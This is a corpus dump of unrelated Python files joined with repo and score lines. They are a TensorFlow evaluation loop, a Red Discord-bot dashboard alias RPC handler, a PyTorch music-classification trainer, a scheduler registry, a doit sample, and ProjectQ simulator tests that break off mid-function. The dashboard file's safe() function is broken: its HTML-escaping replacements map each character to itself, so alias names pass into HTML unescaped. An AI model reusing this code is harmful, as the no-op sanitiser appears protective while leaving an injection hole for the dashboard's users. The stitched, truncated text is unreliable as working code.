preds, _ = sess.run([g['preds'],
g['ts']],
feed_dict={g['x']: np.array(sentences_batch),
g['y']: np.array(targets_batch).reshape(len(targets_batch)),
g['speaker']: np.array(speakers_batch),
g['seqlen']: np.array(sentences_length_batch).reshape(len(targets_batch))})
####################################################################################################################
# Calculate the Train data Confusion Matrix
####################################################################################################################
train_conf_matrix += confusion_matrix(targets_batch, preds, labels=range(data_info['num_classes']))
####################################################################################################################
# Add the end of each training epoch compute the validation results and store the relevant information
####################################################################################################################
if train_data.epoch != epoch:
while val_data.epoch == epoch:
sentences_batch, sentences_length_batch, targets_batch, speakers_batch = val_data.next_batch(batch_size)
preds = sess.run([g['preds']],
feed_dict={g['x']: np.array(sentences_batch),
g['y']: np.array(targets_batch).reshape(len(targets_batch)),
g['speaker']: np.array(speakers_batch),
g['seqlen']: np.array(sentences_length_batch).reshape(
len(targets_batch))})
############################################################################################################
# Calculate the Test data Confusion Matrix
############################################################################################################
val_conf_matrix += confusion_matrix(targets_batch, preds[0], labels=range(data_info['num_classes']))
################################################################################################################
# Compute Accuracy, Precision and Recall
################################################################################################################
train_CM_size = len(train_conf_matrix)
total_train = sum(sum(train_conf_matrix))
train_TP = np.diagonal(train_conf_matrix)
train_FP = [sum(train_conf_matrix[:, i]) - train_TP[i] for i in range(train_CM_size)]
train_FN = [sum(train_conf_matrix[i, :]) - train_TP[i] for i in range(train_CM_size)]
train_TN = train_CM_size - train_TP - train_FP - train_FN
train_precision = train_TP / (train_TP + train_FP) # aka True Positive Rate
train_recall = train_TP / (train_TP + train_FN)
total_train_correct = sum(train_TP)
total_train_accuracy = total_train_correct / total_train
total_train_precision = sum(train_precision) / train_CM_size
total_train_recall = sum(train_recall) / train_CM_size
val_CM_size = len(val_conf_matrix)
total_val = sum(sum(val_conf_matrix))
val_TP = np.diagonal(val_conf_matrix)
val_FP = [sum(val_conf_matrix[:, i]) - val_TP[i] for i in range(val_CM_size)]
val_FN = [sum(val_conf_matrix[i, :]) - val_TP[i] for i in range(val_CM_size)]
val_TN = val_CM_size - val_TP - val_FP - val_FN
val_precision = val_TP / (val_TP + val_FP)
val_recall = val_TP / (val_TP + val_FN)
total_val_correct = sum(val_TP)
total_val_accuracy = total_val_correct / total_val
total_val_precision = sum(val_precision) / val_CM_size
total_val_recall = sum(val_recall) / val_CM_size
################################################################################################################
# Store Accuracy Precision Recall
################################################################################################################
train_acc_summary = tf.Summary(
value=[tf.Summary.Value(tag="accuracy", simple_value=total_train_accuracy), ])
train_prec_summary = tf.Summary(
value=[tf.Summary.Value(tag="precision", simple_value=total_train_precision), ])
train_rec_summary = tf.Summary(value=[tf.Summary.Value(tag="recall", simple_value=total_train_recall), ])
val_acc_summary = tf.Summary(value=[tf.Summary.Value(tag="accuracy", simple_value=total_val_accuracy), ])
val_prec_summary = tf.Summary(
value=[tf.Summary.Value(tag="precision", simple_value=total_val_precision), ])
val_rec_summary = tf.Summary(value=[tf.Summary.Value(tag="recall", simple_value=total_val_recall), ])
writer_train.add_summary(train_acc_summary, epoch)
writer_train.add_summary(train_prec_summary, epoch)
writer_train.add_summary(train_rec_summary, epoch)
writer_val.add_summary(val_acc_summary, epoch)
writer_val.add_summary(val_prec_summary, epoch)
writer_val.add_summary(val_rec_summary, epoch)
writer_train.flush()
writer_val.flush()
################################################################################################################
# Print the confusion matrix and store important information
################################################################################################################
print(train_conf_matrix)
print(val_conf_matrix)
if best_acc < total_val_accuracy:
saver.save(sess, log_dir + "acc_best_validation_model.ckpt")
best_acc = total_val_accuracy
best_epoch = epoch
store_info = {'epoch': best_epoch,
'train_conf_matrix': list([list(x) for x in train_conf_matrix]),
'train_accuracy': total_train_accuracy,
'train_precision': list(train_precision),
'total_train_precision': total_train_precision,
'train_recall': list(train_recall),
'total_train_recall': total_train_recall,
'val_conf_matrix': list([list(x) for x in val_conf_matrix]),
'val_accuracy': total_val_accuracy,
'val_precision': list(val_precision),
'total_val_precision': total_val_precision,
'val_recall': list(val_recall),
'total_val_recall': total_val_recall}
store_convergence_info = {'epoch': train_data.epoch,
'train_conf_matrix': list([list(x) for x in train_conf_matrix]),
'train_accuracy': total_train_accuracy,
'train_precision': list(train_precision),
'total_train_precision': total_train_precision,
'train_recall': list(train_recall),
'total_train_recall': total_train_recall,
'val_conf_matrix': list([list(x) for x in val_conf_matrix]),
'val_accuracy': total_val_accuracy,
'val_precision': list(val_precision),
'total_val_precision': total_val_precision,
'val_recall': list(val_recall),
'total_val_recall': total_val_recall}
################################################################################################################
# Get ready for the next epoch
################################################################################################################
epoch += 1
train_conf_matrix = 0
val_conf_matrix = 0
################################################################################################################
####################################################################################################################
# Add the end of training compute the test results and store the relevant information
####################################################################################################################
while test_data.epoch == 0:
sentences_batch, sentences_length_batch, targets_batch, speakers_batch = test_data.next_batch(batch_size)
preds = sess.run([g['preds']],
feed_dict={g['x']: np.array(sentences_batch),
g['y']: np.array(targets_batch).reshape(len(targets_batch)),
g['speaker']: np.array(speakers_batch),
g['seqlen']: np.array(sentences_length_batch).reshape(
len(targets_batch))})
############################################################################################################
# Calculate the Test data Confusion Matrix
############################################################################################################
test_conf_matrix += confusion_matrix(targets_batch, preds[0], labels=range(data_info['num_classes']))
################################################################################################################
# Compute Accuracy, Precision and Recall
################################################################################################################
test_CM_size = len(test_conf_matrix)
total_test = sum(sum(test_conf_matrix))
test_TP = np.diagonal(test_conf_matrix)
test_FP = [sum(test_conf_matrix[:, i]) - test_TP[i] for i in range(test_CM_size)]
test_FN = [sum(test_conf_matrix[i, :]) - test_TP[i] for i in range(test_CM_size)]
test_TN = test_CM_size - test_TP - test_FP - test_FN
test_precision = test_TP / (test_TP + test_FP)
test_recall = test_TP / (test_TP + test_FN)
total_test_correct = sum(test_TP)
total_test_accuracy = total_test_correct / total_test
total_test_precision = sum(test_precision) / test_CM_size
total_test_recall = sum(test_recall) / test_CM_size
################################################################################################################
# Print the confusion matrix and store important information
################################################################################################################
print(test_conf_matrix)
store_convergence_info['test_conf_matrix'] = list([list(x) for x in test_conf_matrix])
store_convergence_info['test_accuracy'] = total_test_accuracy
store_convergence_info['test_precision'] = list(test_precision)
store_convergence_info['total_test_precision'] = total_test_precision
store_convergence_info['test_recall'] = list(test_recall)
store_convergence_info['total_test_recall'] = total_test_recall
# trick to be able to save numpy.int64 into json
def default(o):
if isinstance(o, np.int64): return int(o)
raise TypeError
with open(log_dir + 'convergence_results.p', 'w') as file:
json.dump(store_convergence_info, file, default=default, indent=4)
saver.save(sess, log_dir + "convergence_model.ckpt")
####################################################################################################################
# Add the end of training compute the test results of the best validation model and store the relevant information
####################################################################################################################
saver.restore(sess, log_dir + "acc_best_validation_model.ckpt")
test_conf_matrix = 0
while test_data.epoch == 1:
sentences_batch, sentences_length_batch, targets_batch, speakers_batch = test_data.next_batch(batch_size)
preds = sess.run([g['preds']],
feed_dict={g['x']: np.array(sentences_batch),
g['y']: np.array(targets_batch).reshape(len(targets_batch)),
g['speaker']: np.array(speakers_batch),
g['seqlen']: np.array(sentences_length_batch).reshape(
len(targets_batch))})
############################################################################################################
# Calculate the Test data Confusion Matrix
############################################################################################################
test_conf_matrix += confusion_matrix(targets_batch, preds[0], labels=range(data_info['num_classes']))
################################################################################################################
# Compute Accuracy, Precision and Recall
################################################################################################################
test_CM_size = len(test_conf_matrix)
total_test = sum(sum(test_conf_matrix))
test_TP = np.diagonal(test_conf_matrix)
test_FP = [sum(test_conf_matrix[:, i]) - test_TP[i] for i in range(test_CM_size)]
test_FN = [sum(test_conf_matrix[i, :]) - test_TP[i] for i in range(test_CM_size)]
test_TN = test_CM_size - test_TP - test_FP - test_FN
test_precision = test_TP / (test_TP + test_FP)
test_recall = test_TP / (test_TP + test_FN)
total_test_correct = sum(test_TP)
total_test_accuracy = total_test_correct / total_test
total_test_precision = sum(test_precision) / test_CM_size
total_test_recall = sum(test_recall) / test_CM_size
################################################################################################################
# Print the confusion matrix and store important information
################################################################################################################
print(test_conf_matrix)
store_info['test_conf_matrix'] = list([list(x) for x in test_conf_matrix])
store_info['test_accuracy'] = total_test_accuracy
store_info['test_precision'] = list(test_precision)
store_info['total_test_precision'] = total_test_precision
store_info['test_recall'] = list(test_recall)
store_info['total_test_recall'] = total_test_recall
with open(log_dir + 'acc_best_validation_results.p', 'w') as file:
json.dump(store_info, file, default=default, indent=4)
| 2.171875 | 2 |
dashboard/rpc/alias.py | flaree/Toxic-Cogs | 0 | 6818 | <gh_stars>0
import discord
from redbot.core.bot import Red
from redbot.core.commands import commands
from redbot.core.utils.chat_formatting import humanize_list
from .utils import permcheck, rpccheck
class DashboardRPC_AliasCC:
def __init__(self, cog: commands.Cog):
self.bot: Red = cog.bot
self.cog: commands.Cog = cog
# Initialize RPC handlers
self.bot.register_rpc_handler(self.fetch_aliases)
def unload(self):
self.bot.unregister_rpc_handler(self.fetch_aliases)
@staticmethod
def safe(string):
return (
string.replace("&", "&")
.replace("<", "<")
.replace(">", ">")
.replace('"', """)
)
@rpccheck()
@permcheck("Alias", ["aliascc"])
async def fetch_aliases(self, guild: discord.Guild, member: discord.Member):
aliascog = self.bot.get_cog("Alias")
aliases = await aliascog._aliases.get_guild_aliases(guild)
ida = {}
for alias in aliases:
if len(alias.command) > 50:
command = alias.command[:47] + "..."
else:
command = alias.command
if alias.command not in ida:
ida[alias.command] = {"aliases": [], "shortened": command}
ida[alias.command]["aliases"].append(f"{self.safe(alias.name)}")
data = {}
for command, aliases in ida.items():
data[command] = {
"humanized": humanize_list(
list(map(lambda x: f"<code>{x}</code>", aliases["aliases"]))
),
"raw": aliases["aliases"],
"shortened": aliases["shortened"],
}
return data
| 2.109375 | 2 |
train.py | hafezgh/music_classification | 1 | 6819 | import torch
DEVICE = 'cuda'
import math
import torch.optim as optim
from model import *
import os
import copy, gzip, pickle, time
data_dir = './drive/MyDrive/music_classification/Data'
classes = os.listdir(data_dir+'/images_original')
def fit(model, train_loader, train_len, optimizer, criterion):
model.train()
batch_size = train_loader.batch_size
n_batches = math.ceil(train_len/batch_size)
#print('Batch Size:', batch_size,'Number of Batches:', n_batches)
model.train()
train_running_loss = 0.0
train_running_correct = 0
counter = 0
total = 0
#prog_bar = tqdm(enumerate(train_loader), total=int(train_len/batch_size))
for i, data in enumerate(train_loader):
counter += 1
data, target = data[0].to(DEVICE), data[1].to(DEVICE)
total += target.size(0)
optimizer.zero_grad()
outputs = model(data)
loss = criterion(outputs, target)
train_running_loss += loss.item()
_, preds = torch.max(outputs.data, 1)
train_running_correct += (preds == target).sum().item()
loss.backward()
optimizer.step()
train_loss = train_running_loss / counter
train_accuracy = 100. * train_running_correct / total
return train_loss, train_accuracy
def validate(model, val_loader, val_len, criterion):
model.eval()
val_running_loss = 0.0
val_running_correct = 0
counter = 0
total = 0
batch_size = val_len
#prog_bar = tqdm(enumerate(val_loader), total=int(val_len/batch_size))
with torch.no_grad():
for i, data in enumerate(val_loader):
counter += 1
data, target = data[0].to(DEVICE), data[1].to(DEVICE)
total += target.size(0)
outputs = model(data)
loss = criterion(outputs, target)
val_running_loss += loss.item()
_, preds = torch.max(outputs.data, 1)
val_running_correct += (preds == target).sum().item()
val_loss = val_running_loss / counter
val_accuracy = 100. * val_running_correct / total
return val_loss, val_accuracy
def train(hparams, train_loader, val_loader, train_len, val_len, checkpoint_path=None, **kwargs):
model = CRNN_Base(len(classes), hparams['c'], hparams['h'], hparams['w'], hparams['k'], hparams['filters'],\
hparams['poolings'], hparams['dropout_rate'], gru_units=hparams['gru_units'])
model.to(DEVICE)
optimizer = optim.Adam(model.parameters(), lr=hparams['lr'])
try:
path = kwargs['path']
stream = gzip.open(path, "rb")
checkpoint = pickle.load(stream)
stream.close()
train_loss = checkpoint['train_loss']
train_accuracy = checkpoint['train_accuracy']
val_loss = checkpoint['val_loss']
val_accuracy = checkpoint['val_accuracy']
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
epoch_load = checkpoint['epoch']
print(f'Checkpoint found! Training will resume from epoch {epoch_load+1}')
print('Last epoch results: ')
print(f"Train Loss: {train_loss[-1]:.4f}, Train Acc: {train_accuracy[-1]:.2f}")
print(f'Val Loss: {val_loss[-1]:.4f}, Val Acc: {val_accuracy[-1]:.2f}')
if 'lr_scheduler' in kwargs.keys() and 'scheduler_state_dict' in checkpoint.keys():
if kwargs['lr_scheduler'] == True:
print('Learning rate sceduler is active.\n')
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.1, last_epoch=-1, verbose=True)
scheduler.load_state_dict(checkpoint['scheduler_state_dict'])
else:
scheduler = False
else:
scheduler = False
except:
print('No checkpoints found! Training will start from the beginning.\n')
train_loss, train_accuracy = [], []
val_loss, val_accuracy = [], []
epoch_load = 0
scheduler = None
es = False
if 'lr_scheduler' in kwargs.keys():
if kwargs['lr_scheduler'] == True:
print('Learning rate sceduler is active.\n')
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.1, last_epoch=-1, verbose=True)
else:
scheduler = False
else:
scheduler = False
es = False
if 'early_stopping' in kwargs.keys():
print('Early stopping is active.')
print()
es = True
min_val_loss = np.inf
patience = 30
epochs_no_improve = 0
best_model = None
criterion = nn.CrossEntropyLoss()
start = time.time()
for epoch in range(hparams['epochs']-epoch_load):
print(f"Epoch {epoch+epoch_load+1} of {hparams['epochs']}")
train_epoch_loss, train_epoch_accuracy = fit(
model, train_loader, train_len, optimizer, criterion
)
val_epoch_loss, val_epoch_accuracy = validate(
model, val_loader, val_len, criterion
)
if scheduler:
scheduler.step()
train_loss.append(train_epoch_loss)
train_accuracy.append(train_epoch_accuracy)
val_loss.append(val_epoch_loss)
val_accuracy.append(val_epoch_accuracy)
if es:
if val_epoch_loss < min_val_loss:
#Saving the model
min_val_loss = val_epoch_loss
best_model = copy.deepcopy(model.state_dict())
epochs_no_improve = 0
else:
epochs_no_improve += 1
# Check early stopping condition
if epochs_no_improve == patience:
print(f'Early stopping after {epoch+epoch_load+1} epochs!')
model.load_state_dict(best_model)
break
print(f"Train Loss: {train_epoch_loss:.4f}, Train Acc: {train_epoch_accuracy:.2f}")
print(f'Val Loss: {val_epoch_loss:.4f}, Val Acc: {val_epoch_accuracy:.2f}')
checkpoint_to_save = {'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'epoch': epoch+epoch_load,
'train_loss': train_loss,
'val_loss': val_loss,
'train_accuracy': train_accuracy,
'val_accuracy': val_accuracy
}
if scheduler:
checkpoint_to_save['scheduler_state_dict'] = scheduler.state_dict()
## Saving the model
if checkpoint_path != None:
stream = gzip.open(checkpoint_path, "wb")
pickle.dump(checkpoint_to_save, stream)
stream.close()
end = time.time()
print(f"Training time: {(end-start)/60:.3f} minutes")
return model, train_loss, train_accuracy, val_loss, val_accuracy | 2.390625 | 2 |
dlk/core/schedulers/__init__.py | cstsunfu/dlkit | 0 | 6820 | <filename>dlk/core/schedulers/__init__.py
# Copyright 2021 cstsunfu. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""schedulers"""
import importlib
import os
from dlk.utils.register import Register
from torch.optim import Optimizer
from torch.optim.lr_scheduler import LambdaLR
import math
scheduler_config_register = Register("Schedule config register.")
scheduler_register = Register("Schedule register.")
class BaseScheduler(object):
"""interface for Schedule"""
def get_scheduler(self)->LambdaLR:
"""return the initialized scheduler
Returns:
Schedule
"""
raise NotImplementedError
def __call__(self):
"""the same as self.get_scheduler()
"""
return self.get_scheduler()
def import_schedulers(schedulers_dir, namespace):
for file in os.listdir(schedulers_dir):
path = os.path.join(schedulers_dir, file)
if (
not file.startswith("_")
and not file.startswith(".")
and (file.endswith(".py") or os.path.isdir(path))
):
scheduler_name = file[: file.find(".py")] if file.endswith(".py") else file
importlib.import_module(namespace + "." + scheduler_name)
# automatically import any Python files in the schedulers directory
schedulers_dir = os.path.dirname(__file__)
import_schedulers(schedulers_dir, "dlk.core.schedulers")
| 2.390625 | 2 |
doc/samples/pos.py | m4ta1l/doit | 1,390 | 6821 | def task_pos_args():
def show_params(param1, pos):
print('param1 is: {0}'.format(param1))
for index, pos_arg in enumerate(pos):
print('positional-{0}: {1}'.format(index, pos_arg))
return {'actions':[(show_params,)],
'params':[{'name':'param1',
'short':'p',
'default':'default value'},
],
'pos_arg': 'pos',
'verbosity': 2,
}
| 2.671875 | 3 |
projectq/backends/_qracksim/_simulator_test.py | vm6502q/ProjectQ | 1 | 6822 | # Copyright 2017 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for projectq.backends._sim._simulator.py, using both the Python
and the C++ simulator as backends.
"""
import copy
import math
import cmath
import numpy
import pytest
import random
import scipy
import scipy.sparse
import scipy.sparse.linalg
from projectq import MainEngine
from projectq.cengines import (BasicEngine, BasicMapperEngine, DummyEngine,
LocalOptimizer, NotYetMeasuredError)
from projectq.ops import (All, Allocate, BasicGate, BasicMathGate, CNOT, C,
Command, H, Measure, QubitOperator, Rx, Ry, Rz, S,
TimeEvolution, Toffoli, X, Y, Z, Swap, SqrtSwap,
UniformlyControlledRy, UniformlyControlledRz)
from projectq.libs.math import (AddConstant,
AddConstantModN,
SubConstant,
SubConstantModN,
MultiplyByConstantModN)
from projectq.meta import Compute, Uncompute, Control, Dagger, LogicalQubitIDTag
from projectq.types import WeakQubitRef
from projectq.backends import Simulator
tolerance = 1e-6
def test_is_qrack_simulator_present():
_qracksim = pytest.importorskip("projectq.backends._qracksim._qracksim")
import projectq.backends._qracksim._qracksim as _
def get_available_simulators():
result = []
try:
test_is_qrack_simulator_present()
result.append("qrack_simulator_qengine")
result.append("qrack_simulator_qunit")
except:
pass
return result
@pytest.fixture(params=get_available_simulators())
def sim(request):
if request.param == "qrack_simulator_qengine":
from projectq.backends._qracksim._qracksim import QrackSimulator as QrackSim
sim = Simulator()
sim._simulator = QrackSim(1, -1, 1)
elif request.param == "qrack_simulator_qunit":
from projectq.backends._qracksim._qracksim import QrackSimulator as QrackSim
sim = Simulator()
sim._simulator = QrackSim(1, -1, 2)
return sim
@pytest.fixture(params=["mapper", "no_mapper"])
def mapper(request):
"""
Adds a mapper which changes qubit ids by adding 1
"""
if request.param == "mapper":
class TrivialMapper(BasicMapperEngine):
def __init__(self):
BasicEngine.__init__(self)
self.current_mapping = dict()
def receive(self, command_list):
for cmd in command_list:
for qureg in cmd.all_qubits:
for qubit in qureg:
if qubit.id == -1:
continue
elif qubit.id not in self.current_mapping:
previous_map = self.current_mapping
previous_map[qubit.id] = qubit.id + 1
self.current_mapping = previous_map
self._send_cmd_with_mapped_ids(cmd)
return TrivialMapper()
if request.param == "no_mapper":
return None
class Mock1QubitGate(BasicGate):
def __init__(self):
BasicGate.__init__(self)
self.cnt = 0
@property
def matrix(self):
self.cnt += 1
return numpy.matrix([[0, 1],
[1, 0]])
class Mock6QubitGate(BasicGate):
def __init__(self):
BasicGate.__init__(self)
self.cnt = 0
@property
def matrix(self):
self.cnt += 1
return numpy.eye(2 ** 6)
class MockNoMatrixGate(BasicGate):
def __init__(self):
BasicGate.__init__(self)
self.cnt = 0
@property
def matrix(self):
self.cnt += 1
raise AttributeError
def test_simulator_is_available(sim):
backend = DummyEngine(save_commands=True)
eng = MainEngine(backend, [])
qubit = eng.allocate_qubit()
Measure | qubit
qubit[0].__del__()
assert len(backend.received_commands) == 3
# Test that allocate, measure, basic math, and deallocate are available.
for cmd in backend.received_commands:
assert sim.is_available(cmd)
new_cmd = backend.received_commands[-1]
new_cmd.gate = Mock6QubitGate()
assert not sim.is_available(new_cmd)
new_cmd.gate = MockNoMatrixGate()
assert not sim.is_available(new_cmd)
new_cmd.gate = Mock1QubitGate()
assert sim.is_available(new_cmd)
new_cmd = backend.received_commands[-2]
assert len(new_cmd.qubits) == 1
new_cmd.gate = AddConstantModN(1, 2)
assert sim.is_available(new_cmd)
new_cmd.gate = MultiplyByConstantModN(1, 2)
assert sim.is_available(new_cmd)
#new_cmd.gate = DivideByConstantModN(1, 2)
#assert sim.is_available(new_cmd)
def test_simulator_cheat(sim):
# cheat function should return a tuple
assert isinstance(sim.cheat(), tuple)
# first entry is the qubit mapping.
# should be empty:
assert len(sim.cheat()[0]) == 0
# state vector should only have 1 entry:
assert len(sim.cheat()[1]) == 1
eng = MainEngine(sim, [])
qubit = eng.allocate_qubit()
# one qubit has been allocated
assert len(sim.cheat()[0]) == 1
assert sim.cheat()[0][0] == 0
assert len(sim.cheat()[1]) == 2
assert 1. == pytest.approx(abs(sim.cheat()[1][0]))
qubit[0].__del__()
# should be empty:
assert len(sim.cheat()[0]) == 0
# state vector should only have 1 entry:
assert len(sim.cheat()[1]) == 1
def test_simulator_functional_measurement(sim):
eng = MainEngine(sim, [])
qubits = eng.allocate_qureg(5)
# entangle all qubits:
H | qubits[0]
for qb in qubits[1:]:
CNOT | (qubits[0], qb)
All(Measure) | qubits
bit_value_sum = sum([int(qubit) for qubit in qubits])
assert bit_value_sum == 0 or bit_value_sum == 5
def test_simulator_measure_mapped_qubit(sim):
eng = MainEngine(sim, [])
qb1 = WeakQubitRef(engine=eng, idx=1)
qb2 = WeakQubitRef(engine=eng, idx=2)
cmd0 = Command(engine=eng, gate=Allocate, qubits=([qb1],))
cmd1 = Command(engine=eng, gate=X, qubits=([qb1],))
cmd2 = Command(engine=eng, gate=Measure, qubits=([qb1],), controls=[],
tags=[LogicalQubitIDTag(2)])
with pytest.raises(NotYetMeasuredError):
int(qb1)
with pytest.raises(NotYetMeasuredError):
int(qb2)
eng.send([cmd0, cmd1, cmd2])
eng.flush()
with pytest.raises(NotYetMeasuredError):
int(qb1)
assert int(qb2) == 1
def test_simulator_kqubit_exception(sim):
m1 = Rx(0.3).matrix
m2 = Rx(0.8).matrix
m3 = Ry(0.1).matrix
m4 = Rz(0.9).matrix.dot(Ry(-0.1).matrix)
m = numpy.kron(m4, numpy.kron(m3, numpy.kron(m2, m1)))
class KQubitGate(BasicGate):
@property
def matrix(self):
return m
eng = MainEngine(sim, [])
qureg = eng.allocate_qureg(3)
with pytest.raises(Exception):
KQubitGate() | qureg
with pytest.raises(Exception):
H | qureg
def test_simulator_swap(sim):
eng = MainEngine(sim, [])
qubits1 = eng.allocate_qureg(1)
qubits2 = eng.allocate_qureg(1)
X | qubits1
Swap | (qubits1, qubits2)
All(Measure) | qubits1
All(Measure) | qubits2
assert (int(qubits1[0]) == 0) and (int(qubits2[0]) == 1)
SqrtSwap | (qubits1, qubits2)
SqrtSwap | (qubits1, qubits2)
All(Measure) | qubits1
All(Measure) | qubits2
assert (int(qubits1[0]) == 1) and (int(qubits2[0]) == 0)
def test_simulator_math(sim):
eng = MainEngine(sim, [])
qubits = eng.allocate_qureg(8)
AddConstant(1) | qubits;
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 1
AddConstantModN(10, 256) | qubits;
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 11
controls = eng.allocate_qureg(1)
# Control is off
C(AddConstantModN(10, 256)) | (controls, qubits)
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 11
# Turn control on
X | controls
C(AddConstantModN(10, 256)) | (controls, qubits)
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 21
SubConstant(5) | qubits;
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 16
C(SubConstantModN(10, 256)) | (controls, qubits)
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 6
# Turn control off
X | controls
C(SubConstantModN(10, 256)) | (controls, qubits)
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 6
MultiplyByConstantModN(2, 256) | qubits;
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 12
# Control is off
C(MultiplyByConstantModN(2, 256)) | (controls, qubits)
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 12
# Turn control on
X | controls
C(MultiplyByConstantModN(10, 256)) | (controls, qubits)
All(Measure) | qubits
value = 0
for i in range(len(qubits)):
value += int(qubits[i]) << i
assert value == 120
def test_simulator_probability(sim, mapper):
engine_list = [LocalOptimizer()]
if mapper is not None:
engine_list.append(mapper)
eng = MainEngine(sim, engine_list=engine_list)
qubits = eng.allocate_qureg(6)
All(H) | qubits
eng.flush()
bits = [0, 0, 1, 0, 1, 0]
for i in range(6):
assert (eng.backend.get_probability(bits[:i], qubits[:i]) ==
pytest.approx(0.5**i))
extra_qubit = eng.allocate_qubit()
with pytest.raises(RuntimeError):
eng.backend.get_probability([0], extra_qubit)
del extra_qubit
All(H) | qubits
Ry(2 * math.acos(math.sqrt(0.3))) | qubits[0]
eng.flush()
assert eng.backend.get_probability([0], [qubits[0]]) == pytest.approx(0.3)
Ry(2 * math.acos(math.sqrt(0.4))) | qubits[2]
eng.flush()
assert eng.backend.get_probability([0], [qubits[2]]) == pytest.approx(0.4)
assert (numpy.isclose(0.12, eng.backend.get_probability([0, 0], qubits[:3:2]), rtol=tolerance, atol=tolerance))
assert (numpy.isclose(0.18, eng.backend.get_probability([0, 1], qubits[:3:2]), rtol=tolerance, atol=tolerance))
assert (numpy.isclose(0.28, eng.backend.get_probability([1, 0], qubits[:3:2]), rtol=tolerance, atol=tolerance))
All(Measure) | qubits
def test_simulator_amplitude(sim, mapper):
engine_list = [LocalOptimizer()]
if mapper is not None:
engine_list.append(mapper)
eng = MainEngine(sim, engine_list=engine_list)
qubits = eng.allocate_qureg(6)
All(X) | qubits
All(H) | qubits
eng.flush()
bits = [0, 0, 1, 0, 1, 0]
polR, polPhi = cmath.polar(eng.backend.get_amplitude(bits, qubits))
while polPhi < 0:
polPhi += 2 * math.pi
assert polR == pytest.approx(1. / 8.)
bits = [0, 0, 0, 0, 1, 0]
polR2, polPhi2 = cmath.polar(eng.backend.get_amplitude(bits, qubits))
while polPhi2 < math.pi:
polPhi2 += 2 * math.pi
assert polR2 == pytest.approx(polR)
assert (polPhi2 - math.pi) == pytest.approx(polPhi)
bits = [0, 1, 1, 0, 1, 0]
polR3, polPhi3 = cmath.polar(eng.backend.get_amplitude(bits, qubits))
while polPhi3 < math.pi:
polPhi3 += 2 * math.pi
assert polR3 == pytest.approx(polR)
assert (polPhi3 - math.pi) == pytest.approx(polPhi)
All(H) | qubits
All(X) | qubits
Ry(2 * math.acos(0.3)) | qubits[0]
eng.flush()
bits = [0] * 6
polR, polPhi = cmath.polar(eng.backend.get_amplitude(bits, qubits))
assert polR == pytest.approx(0.3)
bits[0] = 1
polR, polPhi = cmath.polar(eng.backend.get_amplitude(bits, qubits))
assert (polR ==
pytest.approx(math.sqrt(0.91)))
All(Measure) | qubits
# raises if not all qubits are in the list:
with pytest.raises(RuntimeError):
eng.backend.get_amplitude(bits, qubits[:-1])
# doesn't just check for length:
with pytest.raises(RuntimeError):
eng.backend.get_amplitude(bits, qubits[:-1] + [qubits[0]])
extra_qubit = eng.allocate_qubit()
eng.flush()
# there is a new qubit now!
with pytest.raises(RuntimeError):
eng.backend.get_amplitude(bits, qubits)
def test_simulator_set_wavefunction(sim, mapper):
engine_list = [LocalOptimizer()]
if mapper is not None:
engine_list.append(mapper)
eng = MainEngine(sim, engine_list=engine_list)
qubits = eng.allocate_qureg(2)
wf = [0., 0., math.sqrt(0.2), math.sqrt(0.8)]
with pytest.raises(RuntimeError):
eng.backend.set_wavefunction(wf, qubits)
eng.flush()
eng.backend.set_wavefunction(wf, qubits)
assert pytest.approx(eng.backend.get_probability('1', [qubits[0]])) == .8
assert pytest.approx(eng.backend.get_probability('01', qubits)) == .2
assert pytest.approx(eng.backend.get_probability('1', [qubits[1]])) == 1.
All(Measure) | qubits
def test_simulator_set_wavefunction_always_complex(sim):
""" Checks that wavefunction is always complex """
eng = MainEngine(sim)
qubit = eng.allocate_qubit()
eng.flush()
wf = [1., 0]
eng.backend.set_wavefunction(wf, qubit)
Y | qubit
eng.flush()
amplitude = eng.backend.get_amplitude('1', qubit)
assert amplitude == pytest.approx(1j) or amplitude == pytest.approx(-1j)
def test_simulator_collapse_wavefunction(sim, mapper):
engine_list = [LocalOptimizer()]
if mapper is not None:
engine_list.append(mapper)
eng = MainEngine(sim, engine_list=engine_list)
qubits = eng.allocate_qureg(4)
# unknown qubits: raises
with pytest.raises(RuntimeError):
eng.backend.collapse_wavefunction(qubits, [0] * 4)
eng.flush()
eng.backend.collapse_wavefunction(qubits, [0] * 4)
assert pytest.approx(eng.backend.get_probability([0] * 4, qubits)) == 1.
All(H) | qubits[1:]
eng.flush()
assert pytest.approx(eng.backend.get_probability([0] * 4, qubits)) == .125
# impossible outcome: raises
with pytest.raises(RuntimeError):
eng.backend.collapse_wavefunction(qubits, [1] + [0] * 3)
eng.backend.collapse_wavefunction(qubits[:-1], [0, 1, 0])
probability = eng.backend.get_probability([0, 1, 0, 1], qubits)
